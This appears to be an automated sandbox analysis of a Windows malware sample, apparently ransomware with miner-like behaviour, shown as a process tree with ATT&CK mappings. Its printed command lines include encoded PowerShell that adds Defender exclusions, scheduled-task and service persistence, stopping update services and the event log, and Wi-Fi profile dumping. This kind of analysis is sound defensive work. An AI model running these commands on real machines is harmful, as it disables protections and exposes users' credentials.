C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAZQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASABFAEEARABTAEUAVAAgAE4ATwBUACAARABFAFQARQBDAFQARQBEACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBuAGYAZwAjAD4A"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5220
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAawBmACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\systemprocess.exe"C:\Windows\systemprocess.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "HOST" /sc ONLOGON /tr "C:\Windows\systemprocess.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4756
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" wlan show profiles4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "$([System.Environment]::GetEnvironmentVariable('SystemDrive'))\"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /delete /tn "HOST" /f4⤵PID:5064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KrCtYfhVKMt4.bat" "4⤵PID:1512
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:3012
-
-
C:\Windows\system32\timeout.exetimeout /T 5 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:832
-
-
-
-
C:\Windows\host.exe"C:\Windows\host.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5948 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:2008
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:4092
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:1240
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:1800
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:1524
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:704
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "PROCESS HOST"4⤵
- Launches sc.exe
PID:4056
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "PROCESS HOST" binpath= "C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe" start= "auto"4⤵
- Launches sc.exe
PID:3532
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:2580
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "PROCESS HOST"4⤵
- Launches sc.exe
PID:1100
-
-
-
C:\Windows\CompPkg.exe"C:\Windows\CompPkg.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "CompPkg" /tr "C:\Users\Admin\AppData\Roaming\CompPkg.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html4⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6000 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2c8,0x368,0x7ff96d53f208,0x7ff96d53f214,0x7ff96d53f2205⤵PID:5224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1808,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:35⤵PID:3488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2352,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2344 /prefetch:25⤵PID:1496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1924,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:85⤵PID:3700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3480,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:15⤵PID:2756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3512,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:15⤵PID:2764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1596,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=4816 /prefetch:85⤵PID:4760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4848,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5072 /prefetch:85⤵PID:3732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5488,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5496 /prefetch:85⤵PID:3204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5584,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:85⤵PID:64
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5584,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:85⤵PID:2592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window5⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:3876 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x25c,0x260,0x264,0x258,0x280,0x7ff96d53f208,0x7ff96d53f214,0x7ff96d53f2206⤵PID:532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1940,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2860 /prefetch:36⤵PID:396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2832,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2828 /prefetch:26⤵PID:5984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2368,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:86⤵PID:3252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4392,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:86⤵PID:4788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4536,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:86⤵PID:4544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4536,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:86⤵PID:2828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4684,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:86⤵PID:5840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4680,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:86⤵PID:2400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4708,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4588 /prefetch:86⤵PID:6032
-
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "CompPkg"4⤵PID:4632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBBD4.tmp.bat""4⤵PID:5716
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:3552
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\CompPkg.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Users\Admin\AppData\Roaming\CompPkg.exeC:\Users\Admin\AppData\Roaming\CompPkg.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4904
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2016 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff982dedcf8,0x7ff982dedd04,0x7ff982dedd103⤵PID:3968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=1976 /prefetch:23⤵PID:932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1476,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2240 /prefetch:33⤵PID:5200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2248 /prefetch:83⤵PID:2268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3200 /prefetch:13⤵PID:736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3244 /prefetch:13⤵PID:2384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4400,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4420 /prefetch:23⤵PID:5748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4704 /prefetch:13⤵PID:3056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5040,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5056 /prefetch:83⤵PID:2372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5520,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5188 /prefetch:83⤵PID:4684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:1128
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start3⤵PID:3604
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3684
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3864
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4028
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4156
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:4396
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5640
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:5576
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:5508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1516
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4388
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:2312
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:5060
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:5540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3024
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5452
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3512
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exeC:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1920
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1292
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2760
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1760
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:4340
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4492
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:6036
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:4832
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
- Modifies data under HKEY_USERS
PID:5276
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5716
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3340
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4620
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3476
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:5068
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4064
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Indicator Removal
1Clear Windows Event Logs
1Modify Registry
3Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
414B
MD5f39ad1b5334e3c05ea773dd1a5a379f8
SHA15e97ca1a9b40bc933696893780f72bb2954ad17f
SHA256bcf7c1a033d62ebe1502524b8ec9248f955b17e6a9fe79e5717758c5f918b2c3
